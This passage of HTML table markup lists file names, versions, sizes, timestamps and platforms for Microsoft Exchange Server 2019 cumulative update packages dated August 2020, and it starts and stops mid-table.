applicable</td></tr><tr><td>Mpgearparser.dll</td><td>15.2.659.6</td><td>99,720</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Msclassificationadapter.dll</td><td>15.2.659.6</td><td>248,712</td><td>12-Aug-2020</td><td>21:28</td><td>x64</td></tr><tr><td>Msexchangecompliance.exe</td><td>15.2.659.6</td><td>78,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangedagmgmt.exe</td><td>15.2.659.6</td><td>25,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangedelivery.exe</td><td>15.2.659.6</td><td>38,784</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangefrontendtransport.exe</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangehmhost.exe</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangehmrecovery.exe</td><td>15.2.659.6</td><td>29,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>15.2.659.6</td><td>72,584</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangemailboxreplication.exe</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangemigrationworkflow.exe</td><td>15.2.659.6</td><td>69,000</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>15.2.659.6</td><td>71,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangesubmission.exe</td><td>15.2.659.6</td><td>123,264</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>15.2.659.6</td><td>39,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>15.2.659.6</td><td>74,112</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>15.2.659.6</td><td>139,136</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Msexchangewatchdog.exe</td><td>15.2.659.6</td><td>55,680</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Mspatchlinterop.dll</td><td>15.2.659.6</td><td>53,640</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Nativehttpproxy.dll</td><td>15.2.659.6</td><td>91,520</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Navigatorparser.dll</td><td>15.2.659.6</td><td>636,800</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Nego2nativeinterface.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Negotiateclientcertificatemodule.dll</td><td>15.2.659.6</td><td>30,080</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>19,752</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not applicable</td><td>24,567</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Ntspxgen.dll</td><td>15.2.659.6</td><td>80,768</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Oleconverter.exe</td><td>15.2.659.6</td><td>173,960</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Outsideinmodule.dll</td><td>15.2.659.6</td><td>87,944</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Owaauth.dll</td><td>15.2.659.6</td><td>92,032</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Perf_common_extrace.dll</td><td>15.2.659.6</td><td>245,128</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>15.2.659.6</td><td>86,408</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Pipeline2.dll</td><td>15.2.659.6</td><td>1,454,472</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>70,983</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>73,217</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Productinfo.managed.dll</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Proxybinclientsstringsdll</td><td>15.2.659.6</td><td>924,544</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Publicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>23,226</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>250,572</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not applicable</td><td>21,643</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not applicable</td><td>23,561</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>14,672</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>14,990</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>15,000</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>15.2.659.6</td><td>1,104,776</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>15,464</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>21,695</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>14,089</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Restoreserveronprereqfailure.ps1</td><td>Not applicable</td><td>15,129</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>17,198</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Rightsmanagementwrapper.dll</td><td>15.2.659.6</td><td>86,400</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Rollalternateserviceaccountpassword.ps1</td><td>Not applicable</td><td>55,778</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Rpcperf.dll</td><td>15.2.659.6</td><td>23,424</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Rpcproxyshim.dll</td><td>15.2.659.6</td><td>39,296</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Rulesauditmsg.dll</td><td>15.2.659.6</td><td>12,680</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Safehtmlnativewrapper.dll</td><td>15.2.659.6</td><td>34,696</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Scanenginetest.exe</td><td>15.2.659.6</td><td>956,296</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Scanningprocess.exe</td><td>15.2.659.6</td><td>739,208</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Searchdiagnosticinfo.ps1</td><td>Not applicable</td><td>16,800</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Servicecontrol.ps1</td><td>Not applicable</td><td>52,317</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Setmailpublicfolderexternaladdress.ps1</td><td>Not applicable</td><td>20,742</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Settingsadapter.dll</td><td>15.2.659.6</td><td>116,096</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Setup.exe</td><td>15.2.659.6</td><td>20,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Setupui.exe</td><td>15.2.659.6</td><td>188,288</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Split_publicfoldermailbox.ps1</td><td>Not applicable</td><td>52,177</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Startdagservermaintenance.ps1</td><td>Not applicable</td><td>27,851</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Statisticsutil.dll</td><td>15.2.659.6</td><td>142,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Stopdagservermaintenance.ps1</td><td>Not applicable</td><td>21,121</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Storetsconstants.ps1</td><td>Not applicable</td><td>15,818</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Storetslibrary.ps1</td><td>Not applicable</td><td>27,991</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Store_mapi_net_bin_perf_x64_exrpcperf.dll</td><td>15.2.659.6</td><td>28,552</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Sync_mailpublicfolders.ps1</td><td>Not applicable</td><td>43,915</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Sync_modernmailpublicfolders.ps1</td><td>Not applicable</td><td>43,961</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Textconversionmodule.dll</td><td>15.2.659.6</td><td>86,408</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Troubleshoot_ci.ps1</td><td>Not applicable</td><td>22,715</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databaselatency.ps1</td><td>Not applicable</td><td>33,421</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databasespace.ps1</td><td>Not applicable</td><td>30,017</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Uninstall_antispamagents.ps1</td><td>Not applicable</td><td>15,477</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Updateapppoolmanagedframeworkversion.ps1</td><td>Not applicable</td><td>14,018</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Updatecas.ps1</td><td>Not applicable</td><td>35,786</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Updateconfigfiles.ps1</td><td>Not applicable</td><td>19,730</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Updateserver.exe</td><td>15.2.659.6</td><td>3,014,528</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Update_malwarefilteringserver.ps1</td><td>Not applicable</td><td>18,144</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Web.config_053c31bdd6824e95b35d61b0a5e7b62d</td><td>Not applicable</td><td>31,813</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Wsbexchange.exe</td><td>15.2.659.6</td><td>125,320</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>X400prox.dll</td><td>15.2.659.6</td><td>103,296</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>_search.lingoperators.a</td><td>15.2.659.6</td><td>34,688</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.lingoperators.b</td><td>15.2.659.6</td><td>34,688</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.a</td><td>15.2.659.6</td><td>290,176</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.mailboxoperators.b</td><td>15.2.659.6</td><td>290,176</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.a</td><td>15.2.659.6</td><td>485,752</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.operatorschema.b</td><td>15.2.659.6</td><td>485,752</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.a</td><td>15.2.659.6</td><td>113,544</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.tokenoperators.b</td><td>15.2.659.6</td><td>113,544</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.a</td><td>15.2.659.6</td><td>67,976</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>_search.transportoperators.b</td><td>15.2.659.6</td><td>67,976</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr></tbody></table></div></div></div><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 5</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.595.6</td><td>71,040</td><td>12-Aug-2020</td><td>20:45</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,506</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,929</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.2.595.6</td><td>106,368</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.2.595.6</td><td>42,880</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.2.595.6</td><td>92,552</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,489</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.2.595.6</td><td>45,440</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.2.595.6</td><td>66,432</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.2.595.6</td><td>118,152</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.2.595.6</td><td>44,424</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.2.595.6</td><td>54,144</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.2.595.6</td><td>69,000</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.neuraltree.dll</td><td>Not applicable</td><td>694,152</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Bigfunnel.neuraltreeranking.dll</td><td>15.2.595.6</td><td>19,848</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.2.595.6</td><td>245,120</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.2.595.6</td><td>189,312</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.2.595.6</td><td>101,248</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.2.595.6</td><td>109,448</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.2.595.6</td><td>3,634,552</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.tracing.dll</td><td>15.2.595.6</td><td>42,880</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.2.595.6</td><td>46,472</td><td>12-Aug-2020</td><td>20:45</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.2.595.6</td><td>42,880</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>15.2.595.6</td><td>83,328</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.2.595.6</td><td>92,032</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,097</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,622</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.2.595.6</td><td>57,224</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,805</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,680</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,480</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.2.595.6</td><td>1,693,056</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.2.595.6</td><td>134,024</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.2.595.6</td><td>48,000</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,644</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>41,886</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>29,947</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.2.595.6</td><td>39,808</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>22,764</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,308</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configurecryptodefaults.ps1</td><td>Not applicable</td><td>42,039</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>19,770</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,828</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,283</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,141</td><td>12-Aug-2020</td><td>20:46</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,620</td><td>12-Aug-2020</td><td>20:45</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,232</td><td>12-Aug-2020</td><td>20:44</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,053</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>14,532</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Convert_distributiongrouptounifiedgroup.ps1</td><td>Not applicable</td><td>34,765</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Create_publicfoldermailboxesformigration.ps1</td><td>Not applicable</td><td>27,912</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.14.4.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.15.20.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.8.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.8.2.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts.8.3.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts_exsmime.dll</td><td>15.2.595.6</td><td>380,800</td><td>12-Aug-2020</td><td>20:46</td><td>x64</td></tr><tr><td>Cts_microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>1,686,392</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Cts_microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Cts_policy.14.0.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.14.1.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.14.2.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Cts_policy.14.3.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.14.4.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.15.0.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.15.1.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.15.2.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,664</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.15.20.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.8.0.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.8.1.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.8.2.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,680</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Cts_policy.8.3.microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Dagcommonlibrary.ps1</td><td>Not applicable</td><td>60,242</td><td>12-Aug-2020</td><td>20:41</td><td>Not applicable</td></tr><tr><td>Dependentassemblygenerator.exe</td><td>15.2.595.6</td><td>22,400</td><td>12-Aug-2020</td><td>20:46</td><td>x86</td></tr><tr><td>Diaghelper.dll</td><td>15.2.595.6</td><td>66,944</td><td>12-Aug-2020</td><td>20:43</td><td>x86</td></tr><tr><td>Diagnosticscriptcommonlibrary.ps1</td><td>Not applicable</td><td>16,334</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Disableinmemorytracing.ps1</td><td>Not applicable</td><td>13,362</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Disable_antimalwarescanning.ps1</td><td>Not applicable</td><td>15,189</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Disable_outsidein.ps1</td><td>Not applicable</td><td>13,654</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Disklockerapi.dll</td><td>Not applicable</td><td>22,400</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Dlmigrationmodule.psm1</td><td>Not applicable</td><td>39,580</td><td>12-Aug-2020</td><td>20:42</td><td>Not applicable</td></tr><tr><td>Dsaccessperf.dll</td><td>15.2.595.6</td><td>45,944</td><td>12-Aug-2020</td><td>20:42</td><td>x64</td></tr><tr><td>Dscperf.dll</td><td>15.2.595.6</td><td>32,648</td><td>12-Aug-2020</td><td>20:41</td><td>x64</td></tr><tr><td>Dup_cts_microsoft.exchange.data.common.dll</td><td>15.2.595.6</td><td>1,686,392</td><td>12-Aug-2020</td><td>20:42</td><td>x86</td></tr><tr><td>Dup_ext_microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>601,480</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Ecpperfcounters.xml</td><td>Not applicable</td><td>30,352</td><td>12-Aug-2020</td><td>20:43</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Edgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll</td><td>15.2.595.6</td><td>12,672</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Edgetransport.exe</td><td>15.2.595.6</td><td>49,536</td><td>12-Aug-2020</td><td>20:41</td><td>x86</td></tr><tr><td>Eext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>502</td><td>12-Aug-2020</td><td>17:59</td><td>Not applicable</td></tr><tr><td>Eext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not 